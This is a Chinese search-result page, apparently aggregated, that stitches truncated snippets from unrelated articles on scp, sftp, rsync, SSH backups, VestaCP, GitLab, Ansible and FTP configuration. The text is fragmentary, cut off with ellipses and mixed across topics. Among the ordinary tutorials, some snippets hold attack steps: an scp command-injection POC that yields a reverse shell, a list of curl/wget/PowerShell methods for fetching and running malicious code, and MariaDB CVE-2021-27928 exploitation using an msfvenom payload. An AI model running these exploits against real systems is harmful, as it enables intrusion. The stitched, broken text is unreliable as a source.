CNNVD=CNNVD-202007-1519 0x01 模拟场景 某公司的某个文件服务器设置了拒绝ssh远程连接,但允许sftp,scp等服务正常访问,其中有可能由以下几种方式实现: 1)scponly...2.在Centos中设置iptables策略,禁用ssh远程连接,但开放scp。 ?...2.使用scp命令,把该文件上传到靶机的/tmp下 scp 1.sh root@192.168.200.167:/tmp/1.sh ?...4.使用POC,远程执行命令。 scp 1.sh root@192.168.200.167:/’`sh 1.sh`’ ? 可以看到,在输完密码后,稍等一会就已经成功反弹了shell,实验结束。...ssh服务,直接连接获取权限即可。
在渗透过程中,攻击者往往需要通过命令下载执行恶意代码,实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。...一、Linux 远程恶意代码执行 01、curl 以用curl的方式执行http页面上的shell脚本,无需download,在本地机器上直接执行。.../x.php && php /tmp/x.php curl+wget合并,实现无文件远程恶意代码执行。...scp username@servername:/path/filename /tmp/local_destination 05、rsync 使用rsync可以进行远程同步,拉取文件到本地服务器。...Powershell 利用powershell远程执行ps1脚本。
Linux系统中的scp(secure copy)命令用于以安全方式在服务器之间复制文件。通过使用SCP命令或安全副本,可以在本地主机和远程主机之间或两个远程主机之间安全地传输文件。...复制当前目录下的rumenz.tar.gz到远程服务器 > scp rumenz.tar.gz root@json.im:/tmp/rumenz.tar.gz 指定了用户名,命令执行后需要输入用户密码;...如果不指定用户名,命令执行后需要输入用户名和密码; 复制rumenz目录到远程服务器 > scp -r rumenz root@json.im:/tmp 复制目录需要加上-r参数 从远程服务器下载rumenz.tar.gz.../tmp 从远程服务器下载rumenz目录 > scp -r root@json.im:/tmp/rumenz . 自定义端口 SCP使用端口22作为默认端口。...如果您制作了一个自动化脚本来复制许多文件,但是您不希望SCP进程浪费带宽,这将很有用。
登录后,移至/tmp临时目录并下载安装脚本: cd /tmp curl -O http://vestacp.com/pub/vst-install.sh 该脚本是官方VestaCP安装脚本的包装器。...它使用官方脚本安装软件,使用8083端口打开管理界面。 输入以下内容使脚本可执行: chmod +x install-vesta-do.sh 最后,运行脚本并安装VestaCP。...如果您已安装VestaCP,请继续执行下一步,我们会将您的用户数据迁移到新服务器。 在VestaCP服务器之间迁移用户数据 VestaCP附带了一些脚本来帮助备份和恢复用户数据。...在本地命令行上,执行以下操作: mkdir /tmp/vesta-backups scp root@old-server.example.com:/backup/* /tmp/vesta-backups.../ scp /tmp/vesta-backups/* root@panel.example.com:/backup/ 现在,将备份.tar文件上载到新服务器的/backup目录,重新登录到新服务器并使用
由于最近写脚本要用sftp,所以整理了相关命令。...abc chgrp group path 将文件“path”的组更改为“group” chmod mode path 将文件“path”的权限更改为...test.txt文件下载到本地 get /tmp/test.txt ~/ #把sftp服务器上test文件下载到本地 get -r /tmp/test/ ~/ #将文件从本地计算机上载到服务器...-r ~/test /tmp/ #在远程服务器上创建一个目录abc mkdir 路径 创建远程目录 lmkdir 路径...command 这个是指在linux上执行command这个命令, 比如!ls是列举linux当前目录下的东东, !rm a.txt是删除linux当前目录下的a.txt文件。
rsync 远程同步 rsync(remote sync) 备份 完全备份 增量备份(差异备份) rsync 优点: 支持增量备份 选择性保持:符号链接,硬链接,文件属性,权限及时间等。...传输前执行压缩,适合于异地备份,镜像服务器等应用。 使用ssh作为传输端口,sftp,ssh,xshell 。...与scp区别: 当文件数据很大时候: scp 的效率太低,(scp是先统计信息,需要多少空间后,在复制) rsync 边复制,边比较,边统计 基础知识 端口:873 模式: 如果直接使用命令rsync...--delete youdi@172.16.1.84:/var/www/html /tmp/html 计划任务: vim /etc/crontab 分 时 日 月 周 用户 脚本...编写触发式同步脚本。 第一: 备份方向,远程备份,不需要用户和密码。同步不使用root用户。 第二:编写触发式脚本: #!
,被清理了就不好了。...创建Shell定时远程备份脚本 在旧服务器上创建定时远程备份脚本 创建自动scp的脚本和日志目录 cd /var/opt/gitlab touch auto_scp.sh cd /backups sudo...mkdir log 因为到时候,我们会将该定时远程备份脚本auto_scp.sh执行的时间,放到Gitlab自动备份脚本auto_scp.sh之后的一小时之内,因此我们只需要每次执行远程备份脚本auto_scp.sh...测试 由于auto_scp.sh执行权限是root,所以还得要交互密 ?...0 10 * * * root rm -rf /var/opt/gitlab/backups/tmp 自动将gitlab备份包scp到新服务器脚本auto_scp.sh #!
,ansible命令执行默认模块 shell 执行shell脚本模块 script 把脚本发到客户端,然后执行,执行脚本命令在远端服务器上 copy 把文件发送到远端 file 设定文件属性模块 service...在执行命令之前对目录进行切换 ansible 172.16.1.31 -m coomand -a "chdir=/tmp touch test.txt" 如果不加chdir=/tmp,默认在...ansible 172.16.1.31 -m shell -a "cd /tmp;pwd" image.png image.png 实践应用: 利用shell执行脚本 第一个步骤.../bin/bash yum install -y htop 第二个步骤: 将脚本发送到远程主机 scp -rp yum.sh 172.16.1.31:/server/scripts image.png...第三个步骤: 将脚本权限进行修改(添加执行权限) ansible 172.16.1.31 -m shell -a "chmod +x /server/scripts/yum.sh" image.png
它使管理员能够设置具有受限远程文件访问权限且无法访问交互式shell的安全用户帐户。 为什么使用scponly而不是普通的SSH?使用scponly,您可以让用户远程访问以下载和上载特定文件。...它们没有交互式shell,这意味着它们无法执行命令。用户只能通过访问服务器scp,sftp或客户端支持这些协议。从安全角度来看,这可以通过限制对服务器上交互式shell的不必要访问来降低攻击面。...更改/pub/upload目录的权限以读取,写入和执行所有者和组,并删除其他人的所有权限: sudo chmod 770 /pub/upload 第六步 - 使用scponly Shell创建用户帐户...更改testuser1主目录的权限,以便仅为所有者读取和执行: sudo chmod 500 /home/testuser1 最后,为testuser1用户设置密码: sudo passwd testuser1...中: cd /tmp 在您的服务器上运行sftp: sftp testuser1@your_server_ip 输入密码时,系统可能会提示您保存ssh密钥。
/scripts/mysql_install_db --user=mysql --datadir=/usr/maria_data image.png 配置启动脚本(操作路径/usr/local/mysql.../support-files/mysql.server /etc/init.d/mysqld chmod +x /etc/init.d/mysqld image.png 编辑配置脚本,填写一下内容:...WITH GRANT OPTION; #更新权限 flush privileges; image.png 测试远程访问: image.png 漏洞利用 Step 1:使用MSF生成载荷 msfvenom...或SSH方式) scp CVE-2021-27928.so @:/tmp/CVE-2021-27928.so scp CVE-2021-27928.so ubuntu@192.168.174.166...:/tmp/CVE-2021-27928.so image.png Step 4:执行以下命令,之后成功反弹shell回来: mysql -u root -p -h 192.168.174.166 -
配置启动脚本(操作路径/usr/local/mysql) cp ....user="root"; #更新权限 flush privileges; #设置任何远程主机都可以访问数据库 GRANT ALL PRIVILEGES ON *.* TO 'root'@'%'...测试远程访问: ?...Step 3:将payload复制到目标主机(可以通过SCP或SSH方式) scp CVE-2021-27928.so @:/tmp/CVE-2021-27928.so scp CVE...Step 4:执行以下命令,之后成功反弹shell回来: mysql -u root -p -h 192.168.174.166 -e 'SET GLOBAL wsrep_provider="/tmp/
Rsync可用于镜像数据,增量备份,在系统之间复制文件,可替代scp,sftp 和 cp 日常等使用的命令。.../rsync_test/# 拉文件# 从远端传到本地,只要对目标文件有读的权限,就可以同步到本地rsync -avH backuptest@your_server_ip:/tmp/rsync_test/...read only = false# 是否只写,值为true时客户端无法下载write only = false# 默认拒绝所有主机连接hosts deny = *# 用户名密码文件,每一行格式是:用户名.../上述命令每次执行都需要输入密码,还有指定密码文件的方式。...同步脚本3.1 rsync 排除多个文件和目录# 举例1,排除文件file1.txt,目录dir1下的所有内容,目录dir2# vim /tmp/include.txt*# vim /tmp/exclude.txt
数据传输过程加密 2、SSH协议版本 SSH协议有两个版本,分别为v1和v2,其特点如下: v1:基于CRC-32做校验,无法防范中间人攻击(Man-in-the-MiddleAttack)...scp //跨主机安全复制工具 ssh-keygen //密钥生成器 ssh-copy-id //将公钥传输至远程服务器 5、OpenSSH...这对于显示哪些用户使用ssh从哪些远程位置进行了登录以及执行了何种操作等内容特别有用 [root@localhost ~]# w 07:49:18 up 18 min, 2 users, load.../静默模式 -i //指定密钥位置 //使用scp命令传送文件到远程主机 [root@localhost ~]# scp test.sh root@172.16.12.138:/tmp...命令将远程主机上的文件传输到本地 [root@localhost ~]# scp root@172.16.12.138:/tmp/test.sh /root/ root@172.16.12.138's
Linux系统中的scp(secure copy)命令用于以安全方式在服务器之间复制文件。通过使用SCP命令或安全副本,可以在本地主机和远程主机之间或两个远程主机之间安全地传输文件。...复制当前目录下的rumenz.tar.gz到远程服务器 > scp rumenz.tar.gz root@json.im:/tmp/rumenz.tar.gz 指定了用户名,命令执行后需要输入用户密码...;如果不指定用户名,命令执行后需要输入用户名和密码; 复制rumenz目录到远程服务器 > scp -r rumenz root@json.im:/tmp 复制目录需要加上-r参数 从远程服务器下载rumenz.tar.gz.../tmp 从远程服务器下载rumenz目录 > scp -r root@json.im:/tmp/rumenz . 自定义端口 SCP使用端口22作为默认端口。...如果您制作了一个自动化脚本来复制许多文件,但是您不希望SCP进程浪费带宽,这将很有用。
,都是自己签发的,很容易被钻空子....Linux下进行远程拷贝文件的命令,和它类似的命令有cp,不过cp只是在本机进行拷贝不能跨服务器,而且scp传输是加密的,可能会稍微影响一下速度.两台主机之间复制文件必需得同时有两台主机的复制执行帐号和操作权限...拷贝到远程的/tmp目录下....100% 898 876.6KB/s 00:00 远程到本地: 将远程的/etc/shadow拷贝到本地的/tmp目录下....远程转发端口 既然"本地端口转发"是指绑定本地端口的转发,那么"远程端口转发"(remote forwarding)当然是指绑定远程端口的转发,下面还是接着看上面那个例子,host1与host2之间无法连通
我们将创建以下脚本: bject_storage.py:此脚本负责与对象存储API交互,创建存储桶,上载文件,下载内容和修剪旧备份。我们的其他脚本将在需要与远程对象存储帐户交互时调用此脚本。...remote-backup-mysql.sh:此脚本通过将文件加密并压缩为单个工件,然后将其上载到远程对象存储库来备份MySQL数据库。它每天开始时创建完整备份,然后每小时创建一次增量备份。...这将执行许多与backup-mysql.sh备份脚本相同的功能,具有更基本的组织结构(因为不需要在本地文件系统上维护备份)以及上载到对象存储的一些额外步骤。...测试远程MySQL备份和下载脚本 现在我们已经有了脚本,我们应该测试以确保它们按预期运行。 执行完全备份 首先通过backup用户调用remote-mysql-backup.sh脚本。...它还使用remote-backup-mysql.py文件中定义的存储桶上载到远程对象存储。
在ssh客户端中包含 ssh|slogin远程登陆、scp远程拷贝、sftp文件传输、ssh-copy-id秘钥分发等应用程序。...@m01 ~]# scp -P22 -rp /tmp/oldboy oldboy@10.0.0.61:/tmp #拉:将远程10.0.0.61服务器/tmp/oldboy文件拉取到本地/opt/目录下...[root@m01 ~]# scp -P22 -rp root@10.0.0.61:/tmp/oldboy /opt/ #限速 [root@m01 ~]# scp /opt/1.txt root@172.16.1.31...2.scp连接时的用户作为为拷贝文件或目录的权限。 3.scp支持数据推送和拉取,每次都是全量拷贝,效率较低。...$i "$1" done 5.脚本实现(跳板机) #!
最初,人们开发和发布PHP程序的时候,为了区别代码库和主程序代码,一般是为代码库文件设置一个“.inc”的扩展名,但是他们很快发现这是一个错误,因为这样的文件无法被PHP解释器正确解析为PHP代码。...如果重要的配置数据被包含在没有合适的扩展名的PHP文件中,那么远程攻击者很容易得到这些信息。...Session机制也为攻击者把自己的输入保存在远程系统的文件中提供了另一个方便的地方,对于上面的例子来说,攻击者需要在远程系统放置一个包含PHP代码的文件,如果不能利用文件上载做到的话,他通常会利用session...限制哪个命令可以被执行 2. 限制哪个函数可以被使用 3. 基于脚本所有权和目标文件所有权的文件访问限制 4....** 设置“open_basedir” 这个选项可以禁止指定目录之外的文件操作,有效地消除了本地文件或者是远程文件被include()的攻击,但是仍需要注意文件上载和session文件的攻击。
FTP提供了充足的命令来使用户和远程建立连接并访问远程文件系统。 2.1.2 命令格式 命令以NVT ASCII串的格式被传输。...指示: log transfer 类别(read/guest/anonumous) (inbound/outbound) 设定指定的用户类别在上载还是下载时的相关信息被记录到/usr/adm...若允许上载,所有新上载的文件的所有者及组由和定义 ,访问权限将为。对于覆盖老文件的上载文件将保持原来的所有者及访问权限信息。...文件上载的权限信息由最大匹配目录项定义,如: upload /var/ftp * no upload /var/ftp /incoming yes ftp daemon 0666 upload /var...上载到/incoming目录下的文件将属于ftp/daemon,访问权限为0666;而上载到/incoming/gifs下的文件将属于jlc/guest,访问权限为0600。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
云直播
对象存储
实时音视频
